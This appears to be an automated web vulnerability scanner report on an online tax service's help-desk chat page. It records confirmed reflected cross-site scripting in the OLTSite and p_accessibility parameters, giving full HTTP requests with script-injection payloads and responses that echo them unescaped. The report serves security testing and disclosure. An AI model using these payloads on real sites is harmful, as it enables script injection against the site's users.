https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=%00%27%22--%3E%3C%2Fstyle%3E%3..

Parameters

Parameter Type Value
OLTSite GET '"--></style></script><script>alert(0x00226F)</script>
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_lva GET 372
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00226F)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_lva=372&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_adp.php?p_faqid=372&p_created=1122357413&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_li=&p_topview=1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:06:04 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=270963 t=1304121964561844
RNT-Machine: 11
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4321
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00226F)%5C/script%5E&p_sid=uH5sjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00226F)%5C/script%5E&p_sid=uH5sjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00226F)%5C/script%5E&p_sid=uH5sjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00226F)%5C/script%5E&p_sid=uH5sjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite='"--></style></script><script>netsparker(0x00226F)</script>&p_sid=uH5sjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="label" colspan="2">Please Note: <br /> <tab..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=3&p_sid=TyYLtJsk&p_accessibili..

Parameters

Parameter Type Value
OLTSite GET 3
p_sid GET TyYLtJsk
p_accessibility GET 1'"--></style></script><script>alert(0x002298)</script>
p_redirect GET 3
p_lva GET 372
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=3&p_sid=TyYLtJsk&p_accessibility=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x002298)%3C%2Fscript%3E&p_redirect=3&p_lva=372&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_adp.php?p_faqid=372&p_created=1122357413&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_li=&p_topview=1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:06:13 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=273610 t=1304121973340729
RNT-Machine: 09
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4323
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=3&p_sid=S1vujKsk&amp;p_accessibility=1'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002298)%5C/script%5E&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=3&p_sid=S1vujKsk&amp;p_accessibility=1'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002298)%5C/script%5E&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=3&p_sid=S1vujKsk&amp;p_accessibility=1'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002298)%5C/script%5E&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=3&p_sid=S1vujKsk&amp;p_accessibility=1'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002298)%5C/script%5E&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=3&p_sid=S1vujKsk&amp;p_accessibility=1'"--></style></script><script>netsparker(0x002298)</script>&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" 